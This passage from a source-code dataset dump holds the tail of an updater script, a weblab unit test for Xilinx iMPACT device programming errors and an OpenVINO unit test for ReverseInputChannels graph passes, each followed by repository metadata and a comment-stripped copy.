cmd=e.cmd,
output=e.output,
returncode=e.returncode
)
overlay_init_done = False
except Exception:
cloudlog.exception("uncaught updated exception, shouldn't happen")
params.put("UpdateFailedCount", str(update_failed_count))
wait_between_updates(wait_helper.ready_event)
if wait_helper.shutdown:
break
# We've been signaled to shut down
dismount_ovfs()
if __name__ == "__main__":
main()
| true
| true
|
1c3e9548ed0e3626ec1a8937ed1278f1b9c00411
| 3,742
|
py
|
Python
|
server/src/test/unit/weblab/experiment/devices/xilinx_impact/test_impact.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | null | null | null |
server/src/test/unit/weblab/experiment/devices/xilinx_impact/test_impact.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | null | null | null |
server/src/test/unit/weblab/experiment/devices/xilinx_impact/test_impact.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo@ordunya.com>
# Jaime Irurzun <jaime.irurzun@gmail.com>
#
import unittest
import test.unit.configuration as configuration_module
import voodoo.configuration as ConfigurationManager
import weblab.experiment.devices.xilinx_impact.impact as XilinxImpact
import weblab.experiment.devices.xilinx_impact.exc as XilinxImpactErrors
class XilinxImpactTestCase(unittest.TestCase):
def setUp(self):
        self.cfg_manager = ConfigurationManager.ConfigurationManager()
self.cfg_manager.append_module(configuration_module)
self._fpga = XilinxImpact.XilinxImpactFPGA(self.cfg_manager)
self._pld = XilinxImpact.XilinxImpactPLD(self.cfg_manager)
def test_program_device(self):
self._fpga.program_device("everything_ok.bit")
self._pld.program_device("everything_ok.jed")
def test_program_device_errors(self):
self._test_program_device_errors(self._fpga)
self._test_program_device_errors(self._pld)
def _test_program_device_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"stderr.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"return-1.file"
)
impact._busy = True
self.assertRaises(
XilinxImpactErrors.AlreadyProgrammingDeviceError,
impact.program_device,
"file.file"
)
impact._busy = False
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.program_device,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.program_device,
"file.file"
)
self.cfg_manager.reload()
def test_source2svf(self):
self._fpga.source2svf("everything_ok.bit")
self._pld.source2svf("everything_ok.jed")
def test_source2svf_errors(self):
self._test_source2svf_errors(self._fpga)
self._test_source2svf_errors(self._pld)
def _test_source2svf_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"return-1.file"
)
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.source2svf,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.source2svf,
"file.file"
)
self.cfg_manager.reload()
def suite():
return unittest.makeSuite(XilinxImpactTestCase)
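# --- Editor's illustrative sketch, not part of the weblab sources ------------
# The error-path tests above poke cfg_manager._values directly and then call
# reload() to restore the configuration. A reusable helper for that pattern
# (hypothetical name, shown only to illustrate the idea) could look like this:
from contextlib import contextmanager

@contextmanager
def overridden_config(cfg_manager, key, value):
    cfg_manager._values[key] = value
    try:
        yield cfg_manager
    finally:
        cfg_manager._values.pop(key, None)
        cfg_manager.reload()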
if __name__ == '__main__':
unittest.main()
| 29.936
| 72
| 0.66542
|
import unittest
import test.unit.configuration as configuration_module
import voodoo.configuration as ConfigurationManager
import weblab.experiment.devices.xilinx_impact.impact as XilinxImpact
import weblab.experiment.devices.xilinx_impact.exc as XilinxImpactErrors
class XilinxImpactTestCase(unittest.TestCase):
def setUp(self):
        self.cfg_manager = ConfigurationManager.ConfigurationManager()
self.cfg_manager.append_module(configuration_module)
self._fpga = XilinxImpact.XilinxImpactFPGA(self.cfg_manager)
self._pld = XilinxImpact.XilinxImpactPLD(self.cfg_manager)
def test_program_device(self):
self._fpga.program_device("everything_ok.bit")
self._pld.program_device("everything_ok.jed")
def test_program_device_errors(self):
self._test_program_device_errors(self._fpga)
self._test_program_device_errors(self._pld)
def _test_program_device_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"stderr.file"
)
self.assertRaises(
XilinxImpactErrors.ProgrammingGotErrors,
impact.program_device,
"return-1.file"
)
impact._busy = True
self.assertRaises(
XilinxImpactErrors.AlreadyProgrammingDeviceError,
impact.program_device,
"file.file"
)
impact._busy = False
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.program_device,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.program_device,
"file.file"
)
self.cfg_manager.reload()
def test_source2svf(self):
self._fpga.source2svf("everything_ok.bit")
self._pld.source2svf("everything_ok.jed")
def test_source2svf_errors(self):
self._test_source2svf_errors(self._fpga)
self._test_source2svf_errors(self._pld)
def _test_source2svf_errors(self, impact):
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"error.file"
)
self.assertRaises(
XilinxImpactErrors.GeneratingSvfFileGotErrors,
impact.source2svf,
"return-1.file"
)
self.cfg_manager._values['xilinx_impact_full_path'] = ['p0wn3d']
self.assertRaises(
XilinxImpactErrors.ErrorProgrammingDeviceError,
impact.source2svf,
"file.file"
)
self.cfg_manager._values.pop('xilinx_impact_full_path')
self.assertRaises(
XilinxImpactErrors.CantFindXilinxProperty,
impact.source2svf,
"file.file"
)
self.cfg_manager.reload()
def suite():
return unittest.makeSuite(XilinxImpactTestCase)
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c3e957f964646052cf94f35d12a79cbb6d2862c
| 16,861
|
py
|
Python
|
tools/mo/unit_tests/mo/back/ReverseInputChannels_test.py
|
opencv/dldt
|
c0a2c98a457a08e8853abc18f5bd462169d0b354
|
[
"Apache-2.0"
] | 1,127
|
2018-10-15T14:36:58.000Z
|
2020-04-20T09:29:44.000Z
|
tools/mo/unit_tests/mo/back/ReverseInputChannels_test.py
|
opencv/dldt
|
c0a2c98a457a08e8853abc18f5bd462169d0b354
|
[
"Apache-2.0"
] | 439
|
2018-10-20T04:40:35.000Z
|
2020-04-19T05:56:25.000Z
|
tools/mo/unit_tests/mo/back/ReverseInputChannels_test.py
|
opencv/dldt
|
c0a2c98a457a08e8853abc18f5bd462169d0b354
|
[
"Apache-2.0"
] | 414
|
2018-10-17T05:53:46.000Z
|
2020-04-16T17:29:53.000Z
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from argparse import Namespace
import numpy as np
from openvino.tools.mo.back.ReverseInputChannels import ReverseChannelsPropagationUp, ReverseChannelsPropagationDown, \
InsertReverseChannels
from openvino.tools.mo.front.common.partial_infer.utils import int64_array, float32_array
from openvino.tools.mo.graph.graph import Node, Graph
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from openvino.tools.mo.utils.runtime_info import OldAPIMapOrder, RTInfo
from unit_tests.utils.graph import build_graph, result, connect, regular_op_with_shaped_data, valued_const_with_data
nodes = {
**regular_op_with_shaped_data('placeholder1', [1, 3, 10, 10], {'type': 'Parameter', 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter'}),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**result('result'),
}
nodes2 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**valued_const_with_data('mul_const', float32_array([-127.5, -127.5, -127.5])),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**valued_const_with_data('pad_const_1', int64_array([0, 0, 0, 0])),
**valued_const_with_data('pad_const_2', int64_array([0, 0, 1, 1])),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
nodes3 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**regular_op_with_shaped_data('transpose', [1, 3, 10, 10], {'type': 'Transpose'}),
**valued_const_with_data('transpose_order', int64_array([0, 3, 1, 2])),
**regular_op_with_shaped_data('reverse_channels_up', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(3)}),
**regular_op_with_shaped_data('reverse_channels_down', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
def get_nodes(shape, axis=1):
return {
**regular_op_with_shaped_data('placeholder1', shape,
{'type': 'Parameter', 'shape': shape, 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter', 'shape': [1, 1, 1, 1]}),
**regular_op_with_shaped_data('mul', shape, {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', shape,
{'op': 'ReverseChannels', 'type': None, 'axis': int64_array(axis)}),
**regular_op_with_shaped_data('pad', shape, {'type': 'Pad'}),
**result('result'),
}
class ReverseInputChannelsTest(unittest.TestCase):
def check_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
self.assertTrue(out_node['fw_tensor_debug_info'] == ['fw_name', 0])
else:
for idx in node.out_nodes():
out_node = node.out_node(idx)
self.assertFalse('fw_tensor_debug_info' in out_node)
def set_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
out_node['fw_tensor_debug_info'] = ['fw_name', 0]
def test_lift_up_through_eltwise(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_eltwise_broadcast(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
placeholder_node = Node(graph, 'placeholder2')
placeholder_node.out_port(0).data.set_shape([])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_pad(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_pad2(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels:0', '0:result'),
*connect('reverse_channels:0', '0:result2')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_pass_rc_through(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', '0:pad'),
*connect('pad_const_1', '1:pad'), *connect('pad_const_2', '2:pad'),
*connect('pad', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationDown.pass_rc_through_zero_port_only(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
        reverse_channels = Node(graph, 'reverse_channels_up')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_up_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
reverse_channels.axis = int64_array(-3)
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
reverse_channels.axis = int64_array(-1)
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
        reverse_channels = Node(graph, 'reverse_channels_up')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_insert(self):
graph = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 3, 10, 10]),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_old_api_map(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True))
node = Node(graph, 'placeholder1')
old_api_map = OldAPIMapOrder(version=0)
node.rt_info.info[('old_api_map_order', old_api_map.get_version())] = old_api_map
node.rt_info.info[('old_api_map_order', old_api_map.get_version())].old_api_transpose_parameter([0, 2, 3, 1])
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
node2 = Node(graph_ref, 'placeholder1')
node2.rt_info = node.rt_info
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_insert_layout(self):
graph = build_graph(get_nodes([1, 10, 10, 3]),
[*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'result')], nodes_with_edges_only=True,
cli=Namespace(reverse_input_channels=True,
layout_values={
'placeholder1': {'source_layout': 'nhwc', 'target_layout': None}}))
InsertReverseChannels().find_and_replace_pattern(graph)
graph_ref = build_graph(get_nodes([1, 10, 10, 3], 3),
[*connect('placeholder1', 'reverse_channels'), *connect('reverse_channels', '0:mul'),
*connect('placeholder2', '1:mul'), *connect('mul', 'result')])
(flag, resp) = compare_graphs(graph, graph_ref, 'result', check_op_attrs=True)
self.assertTrue(flag, resp)
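# --- Editor's illustrative sketch, not part of the OpenVINO sources ----------
# The transpose tests above encode a small piece of axis bookkeeping: with a
# transpose order of [0, 3, 1, 2], lifting a ReverseChannels node above the
# transpose maps its axis via order[axis] (1 -> 3), while pushing it below the
# transpose maps it via order.index(axis) (3 -> 1); negative axes are first
# normalised by the rank. A standalone sketch of that mapping:
def _remap_reverse_channels_axis(axis, order, lift_up):
    axis = axis % len(order)  # normalise negative axes, e.g. -3 -> 1 for rank 4
    return order[axis] if lift_up else order.index(axis)


assert _remap_reverse_channels_axis(1, [0, 3, 1, 2], lift_up=True) == 3
assert _remap_reverse_channels_axis(-3, [0, 3, 1, 2], lift_up=True) == 3
assert _remap_reverse_channels_axis(3, [0, 3, 1, 2], lift_up=False) == 1
assert _remap_reverse_channels_axis(-1, [0, 3, 1, 2], lift_up=False) == 1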
| 54.041667
| 120
| 0.593678
|
import unittest
from argparse import Namespace
import numpy as np
from openvino.tools.mo.back.ReverseInputChannels import ReverseChannelsPropagationUp, ReverseChannelsPropagationDown, \
InsertReverseChannels
from openvino.tools.mo.front.common.partial_infer.utils import int64_array, float32_array
from openvino.tools.mo.graph.graph import Node, Graph
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from openvino.tools.mo.utils.runtime_info import OldAPIMapOrder, RTInfo
from unit_tests.utils.graph import build_graph, result, connect, regular_op_with_shaped_data, valued_const_with_data
nodes = {
**regular_op_with_shaped_data('placeholder1', [1, 3, 10, 10], {'type': 'Parameter', 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter'}),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**result('result'),
}
nodes2 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**valued_const_with_data('mul_const', float32_array([-127.5, -127.5, -127.5])),
**regular_op_with_shaped_data('mul', [1, 3, 10, 10], {'type': 'Multiply'}),
**valued_const_with_data('pad_const_1', int64_array([0, 0, 0, 0])),
**valued_const_with_data('pad_const_2', int64_array([0, 0, 1, 1])),
**regular_op_with_shaped_data('pad', [1, 3, 10, 10], {'type': 'Pad'}),
**regular_op_with_shaped_data('reverse_channels', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
nodes3 = {
**regular_op_with_shaped_data('placeholder', [1, 3, 10, 10], {'type': 'Parameter'}),
**regular_op_with_shaped_data('transpose', [1, 3, 10, 10], {'type': 'Transpose'}),
**valued_const_with_data('transpose_order', int64_array([0, 3, 1, 2])),
**regular_op_with_shaped_data('reverse_channels_up', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(3)}),
**regular_op_with_shaped_data('reverse_channels_down', [1, 3, 10, 10],
{'type': 'ReverseChannels', 'axis': int64_array(1)}),
**result('result'),
**result('result2'),
}
def get_nodes(shape, axis=1):
return {
**regular_op_with_shaped_data('placeholder1', shape,
{'type': 'Parameter', 'shape': shape, 'rt_info': RTInfo()}),
**regular_op_with_shaped_data('placeholder2', [1, 1, 1, 1], {'type': 'Parameter', 'shape': [1, 1, 1, 1]}),
**regular_op_with_shaped_data('mul', shape, {'type': 'Multiply'}),
**regular_op_with_shaped_data('reverse_channels', shape,
{'op': 'ReverseChannels', 'type': None, 'axis': int64_array(axis)}),
**regular_op_with_shaped_data('pad', shape, {'type': 'Pad'}),
**result('result'),
}
class ReverseInputChannelsTest(unittest.TestCase):
def check_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
self.assertTrue(out_node['fw_tensor_debug_info'] == ['fw_name', 0])
else:
for idx in node.out_nodes():
out_node = node.out_node(idx)
self.assertFalse('fw_tensor_debug_info' in out_node)
def set_graph_attrs(self, graph: Graph, parameter_node_names: list):
for node in graph.get_op_nodes():
if node.soft_get('name') in parameter_node_names:
self.assertTrue(node.soft_get('type') == 'Parameter')
out_node = node.out_node(0)
out_node['fw_tensor_debug_info'] = ['fw_name', 0]
def test_lift_up_through_eltwise(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_eltwise_broadcast(self):
graph = build_graph(nodes, [*connect('placeholder1', '0:mul'), *connect('placeholder2', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder1', 'placeholder2'])
placeholder_node = Node(graph, 'placeholder2')
placeholder_node.out_port(0).data.set_shape([])
node = Node(graph, 'mul')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationUp.lift_up_through_eltwise(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder1', 'placeholder2'])
def test_lift_up_through_pad(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_pad2(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', '0:pad'), *connect('pad_const_1', '1:pad'),
*connect('pad_const_2', '2:pad'), *connect('pad', 'reverse_channels'),
*connect('reverse_channels:0', '0:result'),
*connect('reverse_channels:0', '0:result2')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_zero_port_only(node,
reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
def test_pass_rc_through(self):
graph = build_graph(nodes2, [*connect('placeholder', '0:mul'), *connect('mul_const', '1:mul'),
*connect('mul', 'reverse_channels'), *connect('reverse_channels', '0:pad'),
*connect('pad_const_1', '1:pad'), *connect('pad_const_2', '2:pad'),
*connect('pad', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'pad')
reverse_channels = Node(graph, 'reverse_channels')
ReverseChannelsPropagationDown.pass_rc_through_zero_port_only(node, reverse_channels)
self.check_graph_attrs(graph, ['placeholder'])
def test_lift_up_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_down'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_down', 'transpose'),
*connect('transpose', 'result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_down')
keep_moving_up, new_reverses = ReverseChannelsPropagationUp.lift_up_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_up is True)
self.assertTrue(len(new_reverses) == 1)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
reverse_channels = Node(graph, 'reverse_channels_down')
self.assertTrue(reverse_channels.axis == 3)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_down_through_transpose(self):
graph = build_graph(nodes3, [*connect('placeholder', 'reverse_channels_up'),
*connect('transpose_order', '1:transpose'),
*connect('reverse_channels_up', '0:transpose'),
*connect('transpose', 'result')])
graph_ref = build_graph(nodes3, [*connect('placeholder', '0:transpose'),
*connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_up'),
*connect('reverse_channels_up', '0:result')])
self.set_graph_attrs(graph, ['placeholder'])
node = Node(graph, 'transpose')
reverse_channels = Node(graph, 'reverse_channels_up')
keep_moving_down = ReverseChannelsPropagationDown.pass_rc_through_transpose(node, reverse_channels)
self.assertTrue(keep_moving_down is True)
self.check_graph_attrs(graph, ['placeholder'])
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
        reverse_channels = Node(graph, 'reverse_channels_up')
self.assertTrue(reverse_channels.axis == 1)
self.assertTrue(type(reverse_channels.axis) == np.ndarray)
def test_lift_up_through_transpose_negative_axis(self):
graph = build_graph(nodes3, [*connect('placeholder', '0:transpose'), *connect('transpose_order', '1:transpose'),
*connect('transpose', 'reverse_channels_down'),
*connect('reverse_channels_down', 'result')])
